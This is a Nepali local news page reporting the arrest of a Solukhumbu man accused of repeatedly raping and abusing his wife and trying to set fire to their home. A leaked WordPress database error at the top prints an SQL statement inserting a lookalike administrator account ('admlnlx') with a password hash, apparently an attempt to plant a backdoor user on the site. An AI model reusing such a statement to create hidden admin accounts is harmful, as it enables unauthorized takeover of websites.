WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BR/QJbJHKtYsHXbD89KIacgTKZmtyL1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 14:37:54', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । आफ्नै श्रीमतिलाई जबरजस्ती करणी गरेको आरोपमा श्रीमान पक्राउ परेका छन् । नेचासल्यान गाउँपालिका ३ का ४० बर्षिय श्रीमान विरुद्ध करणी गरेको उजुरी दर्ता भएपछि प्रहरीले फागुन १८ गते गिरफ्तार गरेको जनाएको छ । मादक पदार्थ सेवन गरि ३२ बर्षिया श्रीमतिको इच्छा विपरित बारम्बार जवरजस्ती गर्ने गरेको भनी फागुन १७ गते जिल्ला प्रहरी कार्यालय सोलुखुम्बुमा उजुरी परेपछि आरोपित राईलाई घरबाटै गिरफ्तार गरेको प्रहरीले जनाएको छ ।
बैबाहिक जबरजस्ती करणी शिर्षकमा मुद्दा दर्ता गरि अनुशन्धान गरिरहेको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ । गत जेठमा छैटौ श्रीमतीको रुपमा बिबाह गरि ल्याएका श्रीमतिलाई बिबाह भएको एक महिना देखीनै शारीरिक यातना संगै इच्छा विपरित यौन क्रियाकलाप गर्ने गरेको पिडित महिलाले उजुरीमा उल्लेख गरेकी छिन् । फागुन १७ गतेका दिन आरोपित राईले आफ्नै घरमा आगो समेत लगाउने प्रयास गरेको प्रहरीको भनाई छ । साभार: सोलु एफ एम